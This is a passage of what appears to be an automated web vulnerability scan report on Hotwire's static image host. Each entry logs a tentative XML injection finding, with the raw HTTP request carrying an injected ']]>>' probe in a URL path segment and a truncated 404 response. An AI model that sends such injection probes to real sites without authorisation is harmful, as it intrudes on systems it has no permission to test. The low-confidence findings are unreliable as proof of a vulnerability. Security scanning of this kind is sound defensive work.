Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.68. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-and-left-corner.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/global/background/sidebar-module-bottom-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.69. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-and-left-corner.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/background/sidebar-module-bottom-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:01 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.70. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-and-left-corner.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background]]>>/sidebar-module-bottom-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.71. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-and-left-corner.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background/sidebar-module-bottom-and-left-corner.gif]]>>?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:10 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.72. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-right-corner.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/background/sidebar-module-bottom-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.73. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-right-corner.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/global/background/sidebar-module-bottom-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535987
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.74. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-right-corner.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/background/sidebar-module-bottom-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.75. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-right-corner.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background]]>>/sidebar-module-bottom-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:07 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.76. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-right-corner.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background/sidebar-module-bottom-right-corner.gif]]>>?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:11 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.77. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-left-side.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/background/sidebar-module-left-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:55 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.78. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-left-side.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/global/background/sidebar-module-left-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.79. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-left-side.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/background/sidebar-module-left-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535976
Date: Mon, 03 Oct 2011 01:02:01 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.80. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-left-side.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background]]>>/sidebar-module-left-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:05 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.81. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-left-side.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background/sidebar-module-left-side.gif]]>>?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:09 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.82. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-right-side.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/background/sidebar-module-right-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.83. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-right-side.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/global/background/sidebar-module-right-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.84. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-right-side.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/background/sidebar-module-right-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
